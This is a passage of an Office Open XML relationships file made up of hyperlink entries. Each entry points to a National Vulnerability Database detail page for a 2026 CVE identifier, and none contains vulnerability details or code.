Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18415" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82929" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86335" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92103" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94194" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102332" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102333" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102372" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102374" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82382" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82546" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86507" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87752" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91204" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91206" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82933" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102274" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18746" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82936" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87798" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97029" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15953" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70413" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94282" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101005" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101013" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101014" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101016" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101017" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101035" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101052" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101053" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101055" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101068" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101069" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102005" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102006" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94284" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94287" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97686" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101093" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101100" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101859" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102261" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102364" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102367" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82381" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82387" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82969" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88828" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93539" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100753" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101003" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101054" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101070" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101082" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101092" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101098" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101101" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101109" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101111" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101917" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101918" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102265" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102277" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102362" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18825" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52749" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55156" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82932" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86838" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89300" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89411" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92996" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73641" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80358" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94285" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102269" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7170" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7171" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7172" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100370" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101018" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101858" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102263" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59563" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102270" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102366" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101006" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101099" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101143" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101145" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101146" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101278" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102244" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102297" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13018" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86334" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101861" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82326" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97026" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101333" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101915" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102363" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18416" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97399" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97027" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101141" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102264" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102290" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101131" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97025" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101132" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101265" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102279" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101079" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102241" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101071" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101010" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101011" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101139" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101036" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101078" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101080" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100701" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101062" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101895" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10601" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12249" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19032" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32599" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42127" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42129" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5139" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58197" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58463" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58464" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6062" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61554" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61628" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61629" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61630" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61672" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61682" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61687" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61709" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61794" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61795" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61833" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61834" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63199" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63405" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63406" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63445" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63458" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6673" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68497" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71485" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77310" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77339" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8074" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81505" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81871" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82399" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83557" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84292" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84394" TargetMode="External" Id="rId355" /><Relationship 